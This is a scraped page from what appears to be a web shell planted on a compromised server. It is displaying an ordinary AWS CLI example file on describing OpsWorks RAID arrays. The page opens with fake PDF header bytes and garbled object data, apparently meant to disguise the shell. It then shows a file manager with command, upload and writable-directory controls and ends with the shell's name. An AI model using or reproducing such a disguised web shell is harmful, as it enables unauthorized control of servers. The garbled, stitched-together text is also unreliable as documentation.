%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/opsworks/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/opsworks/describe-raid-arrays.rst
**To describe RAID arrays**

The following example describes the RAID arrays attached to the instances in a specified stack. ::

  aws opsworks --region us-east-1 describe-raid-arrays --stack-id d72553d4-8727-448c-9b00-f024f0ba1b06

*Output*: The following is the output for a stack with one RAID array. ::

  {
    "RaidArrays": [
      {
        "StackId": "d72553d4-8727-448c-9b00-f024f0ba1b06", 
        "AvailabilityZone": "us-west-2a", 
        "Name": "Created for php-app1", 
        "NumberOfDisks": 2, 
        "InstanceId": "9f14adbc-ced5-43b6-bf01-e7d0db6cf2f7", 
        "RaidLevel": 0, 
        "VolumeType": "standard", 
        "RaidArrayId": "f2d4e470-5972-4676-b1b8-bae41ec3e51c", 
        "Device": "/dev/md0", 
        "MountPoint": "/mnt/workspace", 
        "CreatedAt": "2015-02-26T23:53:09+00:00", 
        "Size": 100
      } 
    ]
  }

For more information, see `EBS Volumes`_ in the *AWS OpsWorks User Guide*.

.. _`EBS Volumes`: http://docs.aws.amazon.com/opsworks/latest/userguide/workinglayers-basics-edit.html#workinglayers-basics-edit-ebs


Kontol Shell Bypass